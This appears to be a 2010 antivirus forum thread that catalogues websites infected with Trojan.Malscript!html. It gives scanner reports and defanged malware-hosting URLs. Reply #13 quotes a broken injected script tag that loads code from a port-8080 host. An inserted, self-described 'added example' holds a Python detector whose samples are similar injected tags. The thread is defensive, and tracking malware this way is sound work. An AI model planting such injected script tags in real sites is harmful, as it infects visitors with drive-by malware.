Author Topic: Source of infection...

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33897
  • malware fighter
Source of infection...
« on: May 26, 2010, 10:18:12 PM »
Hi malware fighters,

The following site is a redirect for infection of the site mentioned below: http://www.UnmaskParasites.com/security-report/?page=n9uo.com
403 Forbidden

http://safeweb.norton.com/report/show?url=grantsalert.com%2F&x=10&y=8
What is there: Total threats on this site: 38, all instances of Trojan.Malscript!html
Of the 105 pages we tested on the site over the past 90 days, 88 pages resulted in malicious software being downloaded and installed without user consent, and the last time suspicious content was found on this site was on 2010-05-13.

Malicious software includes 91 scripting exploits. Successful infection resulted in an average of 2 new processes on the target machine.

Malicious software is hosted on 2 domain(s), including n9uo*com/, sio3*cn/.
See: http://safeweb.norton.com/report/show?url=sio3.cn&x=0&y=0
http://jsunpack.jeek.org/dec/go?report=61cfc9179bfe18905d4daa6a25cac414df04c50c

1 domain appears to be functioning as an intermediary for distributing malware to visitors of this site, including holeinone*com.tw/,

polonus
     
   
« Last Edit: May 26, 2010, 10:27:25 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus
Re: Source of infection...
« Reply #1 on: June 15, 2010, 12:33:54 AM »
Hi malware fighters,

Similar malcode also detected here:

Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/kmartemploymentapplications.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/americanpageanttest.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/taperfadehaircuts.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/dibujosdepreciousmomentsparapintar.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/mydisholivegardennetwork.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/graffitidrawingletter.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofeastcoastryders.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofbraids.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/trillfamadioslyrics.html

   
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.fear-crew-team.yoyo.pl/eacbdf/myspaceoverlayeditors.html

Description here: htxp://traversecode.com/2009/12/29/trojan-malscripthtml/  (Is flagged by avast shield)

Avast detects this as: JS:Redirector-B (trj)

and an additional suspicious link found here: sexfunbeach.com suspicious ↗  - displaying 1 of 1

    * <Script> link - htxp://sexfunbeach.com/blogs/moms/wp-content/plugins/index.php
    Malicious software includes 42 exploit(s), 19 trojan(s), 6 scripting exploit(s).

    Malicious software is hosted on 3 domains, including traffloads.in/, asfirey.net/, gumblar.cn/.

    This site was hosted on 1 network(s) including AS6428 (CDM).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past sexfunbeach.com appeared to function as an intermediary for the infection of 6 sites including savemyporn.com/, siscon.com.br/, smutboxxx.com/.

Has this site hosted malware?

    Yes, this site has hosted malicious software over the past 90 days. It infected 38 domain(s), including savemyporn.com/, smutboxxx.com/, sp-plan.co.jp/.

The nature of the content of these sites is almost a guarantee of added malware,
so stay away from/clear of pr0n sites.


polonus
   

  
« Last Edit: June 15, 2010, 12:39:00 AM by polonus »


Offline polonus
Re: Source of infection...
« Reply #3 on: June 15, 2010, 06:35:55 PM »
Another site with this malware found:

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/index.html

Blocked by Finjan: see the alert given, attached (ShowBlock.aspx?transid=4C16F4ED)

polonus
« Last Edit: June 15, 2010, 06:43:51 PM by polonus »

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37527
  • Not a avast user

Offline polonus
Re: Source of infection...
« Reply #5 on: June 16, 2010, 05:04:35 PM »
Hi malware fighters,

Another one found here:
Threat Name:    Trojan.Malscript!html
Location:    hxtp://www.kindergarten-zielstrasse.de/
Finjan found: JS/Redirector-u aka JS/Dropper aka Trojan-Downloader.JS.Pegel.ac A

This does not find it: http://wepawet.iseclab.org/view.php?hash=f7f4353f6be53dfe63e3a2cf00b0b46e&t=1276699724&type=js
But what is: htxp://bestdarkstar.info:8080/google.com/imeem.com/ign.com.php  NXDOMAIN  application/x-empty
A known Joomla exploit and appearing in this blocklist: http://doc.emergingthreats.net/pub/Main/HoneywallSamples/hosts

Offline polonus
Re: Source of infection...
« Reply #6 on: June 16, 2010, 08:16:37 PM »
Hi malware fighters,

And another one here:
labradory_krakow.republika.pl
Domain Hash    ad873cf7c1d8d47dbdacfa4b1815def1
IP Address    213.180.128.160
IP Hostname    gwiazdka.republika.pl
IP Country    PL (Poland)
AS Number    12990
AS Name    ONET-PL-AS1 Onet.pl portal network
Detections    4 / 18 (22 %)
Status    DANGEROUS
Threat Name:      Trojan.Malscript!html
Location:    htxp://labradory_krakow.republika.pl/
2 suspicious inline scripts found.
Moreover, Google currently lists this page as suspicious*
    Malicious software includes 2 exploits, 1 scripting exploit, 1 trojan - Troj/Iframe/DY
HTML/Crypted.Gen aka JS/Redir.AQ
Successful infection resulted in an average of 1 new process on the target machine.

    Malicious software is hosted on 7 domains, including searchfunes.org/, mobi-print.com/, adingurj.com/.

    2 domains appear to be functioning as intermediaries for distributing malware to visitors of this site, including scaraori.com/, eplarine.com/.

    This site was hosted on 1 network(s) including AS5617 (Polish Telecom).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past months labradory_krakow.republika.pl appeared to function as an intermediary for the infection of 3 sites including mojpupil.pl/, labrador.toplista.pl/, hodowle.top-100.pl/,
also see WOT: http://www.mywot.com/en/scorecard/labrador.toplista.pl

Read up about the code shown as an attached image:
http://stackoverflow.com/questions/1224670/what-is-the-advantage-of-using-unescape-on-document-write-to-load-javacript

polonus
« Last Edit: June 16, 2010, 08:35:05 PM by polonus »

Offline Pondus

Offline polonus
Re: Source of infection...
« Reply #8 on: June 16, 2010, 10:37:30 PM »
Hi Pondus,

According to the second results, avast needs detection there.
But according to the statistics here, avast's detection rate for the malware should be 38%:
http://lists.clean-mx.com/clean-mx/md5.php?F_Prot=JS/Redir.AQ

pol
« Last Edit: June 16, 2010, 10:44:16 PM by polonus »

Offline polonus
Re: Source of infection...
« Reply #9 on: June 17, 2010, 12:31:58 AM »
Hi malware fighters,

And what do you think 61 instances of it here: http://www.browserdefender.com/site/fear-crew-team.yoyo.pl/

Same trojan,

pol

Offline polonus
Re: Source of infection...
« Reply #10 on: June 19, 2010, 11:16:17 PM »
Hi Pondus,

Now a Norwegian site that has this infection:
webactive24*at
Domain Hash    b4a0ff422b989a8d382f1fbe8c5d2b0a
IP Address    213.188.130.108
IP Hostname    linuxnl-www.active24.nl
IP Country    NO (Norway)
AS Number    12994
AS Name    Active ISP AS
Detections    7 / 19 (37 %)
Status    DANGEROUS

Virus
Threat Name:    Trojan.Malscript!html
Location:    htxp://www.webactive24.at/

Drive-By Downloads
Threat Name:    Trojan.Malscript!html
File name:    c:\documents and settings\user\local settings\temporary internet files\content.ie5\ocieqgj3\webactive24[1].htm
Location:    htxp://webactive24.at/

See the attached image of the malcode...
for lasio.ru see: http://www.google.com/safebrowsing/diagnostic?site=lasio.ru

polonus

   
« Last Edit: June 19, 2010, 11:20:00 PM by polonus »

Offline Pondus
Re: Source of infection...
« Reply #11 on: June 19, 2010, 11:47:34 PM »
VirusTotal - webactive24.at.htm - 28/41   ( Edit: WebSite is now CLEANED )
http://www.virustotal.com/analisis/5da6c6da967a4cb143a46ad9c27b9150e9d8435850064bc8ced16ca86d55f8ab-1276983902
« Last Edit: July 09, 2010, 12:28:46 AM by Pondus »

Offline polonus
Re: Source of infection...
« Reply #12 on: June 27, 2010, 03:03:09 PM »
Hi, another site with Malscript infection found, this time a Czech site:
   
Threat Name:    Trojan.Malscript!html
Location:   hxtp://www.krach-cz.cz/index.htm
Analysis:   htxp://jsunpack.jeek.org/dec/go?report=636f126aa098d95c0adaa1df68f0abfdcab909c4
Found benign here, but is infected with Troj/JSRedir-AK
http://wepawet.iseclab.org/view.php?hash=ef241bff79db6f86ab6377f253308307&t=1277643265&type=js
Location:     hxtp://www.krach-cz.cz/
Our avast av detects JS-Illredir-H here,

polonus

Offline polonus
Re: Source of infection...
« Reply #13 on: June 30, 2010, 01:54:19 PM »
Howdy malware fighters,

Here a list of dangerous subdomains:
http://safeweb.norton.com/report/show?url=oployau.fancountblogger.com.&x=13&y=10

sorydory.russellhowe.com. 3530 IN A 88.198.25.170
Threat Name:    Bloodhound.Exploit.292
Location:    htxp://sorydory.russellhowe.com:8080/Applet1.html

aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
Threat Name:    Bloodhound.Exploit.292
Location:    htxp://aospfpgy.dogplaystation.com:8080/Applet1.html

kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
Threat Name:      Trojan.Malscript!html
Location:    hxtp://kollinsoy.skyefenton.com:8080/HDMI.js

temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23
Threat Name:    Trojan.Malscript!html
Location:    htxp://temp.hbsouthmomsclub.com:8080/Notes1.pdf


The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:
Code:
^sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube*js"^^/sc ript^
<!--8469f3ebb36bebb12b39b0f9e7fe5933--^ (code broken by me, pol)

polonus
« Last Edit: June 30, 2010, 06:02:25 PM by polonus »
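Added example, not code from the thread or from any of the posters: a small Python checker for the two injection patterns discussed above, the injected external script tag on port 8080 followed by a 32-hex-character HTML comment (Reply #13) and the document.write(unescape('...')) loader that hides the same kind of tag behind percent-encoding (Reply #6). Every hostname, path and hash in the sample pages below is constructed for the example and is not one of the IoCs from the thread; the checker itself only looks at the structural pattern (external script on a non-standard port, or a raw IP, and the marker comment), so it can be run over a site's own HTML files offline.

```python
import re
import urllib.parse

# Constructed sample pages (hostnames and hash are made up, not real IoCs).
INJECTED_PAGE = """<html><head><title>Golf club</title>
<script type="text/javascript" src="http://abcdefgh.example-blog.com:8080/YouTube.js"></script>
<!--0123456789abcdef0123456789abcdef-->
</head><body><p>Welcome</p></body></html>"""

# Same loader idea, but the script tag is percent-encoded and emitted by document.write(unescape()).
ESCAPED_LOADER = """<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fbad.example.net%3A8080%2FHDMI.js%22%3E%3C%2Fscript%3E'));</script>"""

CLEAN_PAGE = """<html><head><script src="/js/jquery.min.js"></script></head><body></body></html>"""

SCRIPT_SRC_RE = re.compile(r'<script[^>]+src\s*=\s*["\']([^"\']+)["\']', re.I)
MARKER_RE = re.compile(r'<!--\s*[0-9a-f]{32}\s*-->', re.I)
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", re.I)


def js_unescape(s):
    """Mimic JavaScript unescape(): handle %uXXXX as well as %XX sequences."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return urllib.parse.unquote(s)


def decode_unescape_layers(html, max_depth=5):
    """Return the strings hidden behind unescape('...') calls, following nested layers."""
    found = []
    queue = [html]
    depth = 0
    while queue and depth < max_depth:
        next_queue = []
        for chunk in queue:
            for m in UNESCAPE_RE.finditer(chunk):
                decoded = js_unescape(m.group(1))
                found.append(decoded)
                next_queue.append(decoded)  # a decoded layer may itself contain unescape()
        queue = next_queue
        depth += 1
    return found


def find_suspicious_script_srcs(html):
    """External script sources on a non-standard port or a bare IP, in the page or in decoded layers."""
    hits = []
    for text in [html] + decode_unescape_layers(html):
        for m in SCRIPT_SRC_RE.finditer(text):
            src = m.group(1)
            try:
                parsed = urllib.parse.urlparse(src)
                host, port = parsed.hostname, parsed.port
            except ValueError:
                hits.append(src)  # unparsable URL in a script src is itself worth a look
                continue
            if host is None:
                continue  # relative path, same origin: not what this campaign injects
            if port not in (None, 80, 443) or re.fullmatch(r'\d+\.\d+\.\d+\.\d+', host):
                hits.append(src)
    return hits


def scan_page(html):
    """Summarise the injection indicators found in one HTML document."""
    return {
        "suspicious_srcs": find_suspicious_script_srcs(html),
        "hash_marker": bool(MARKER_RE.search(html)),
        "unescape_loader": bool(UNESCAPE_RE.search(html)),
    }


def is_infected(html):
    """A non-standard-port or bare-IP external script is treated as the deciding indicator."""
    return bool(scan_page(html)["suspicious_srcs"])


if __name__ == "__main__":
    for name, page in (("injected", INJECTED_PAGE), ("escaped", ESCAPED_LOADER), ("clean", CLEAN_PAGE)):
        print(name, scan_page(page))
```

The hash-comment marker and the unescape loader are reported separately rather than used alone to decide, because a 32-hex comment can be a legitimate cache-buster and unescape() has legitimate uses; the external script on port 8080 is the indicator that actually matched every sample in this thread. Run it over the files pulled from the FTP account in question, and any page with a hit is a candidate for having been modified with the stolen credentials.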

Offline polonus
Re: Source of infection...
« Reply #14 on: July 08, 2010, 10:29:02 PM »
Hi malware fighters,

Another one:  Threats found: 1
Here is a complete list:
Threat Name:    Trojan.Malscript!html
Location:    htxp://ee9kd.smartenergymodel.com/js/jquery.min.js
The last time suspicious content was found on this site was on 2010-07-08.
Malicious software includes 4 trojans, 4 exploits

    This site was hosted on 2 network(s) including AS27473 (CIHOST), AS16276 (OVH).

Has this site acted as an intermediary resulting in further distribution of malware?

    Over the past 90 days, smartenergymodel.com appeared to function as an intermediary for the infection of 25 sites including joby.cz/, cherokeestreetnews.org/, dixiequicks.com/.

Has this site hosted malware?

    Yes, this site has hosted malicious software over the past 90 days. It infected 932 domains, including prettymematernity.com/, balioutbound.com/, turkescort.gen.tr/.

How did this happen?

    In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message,

polonus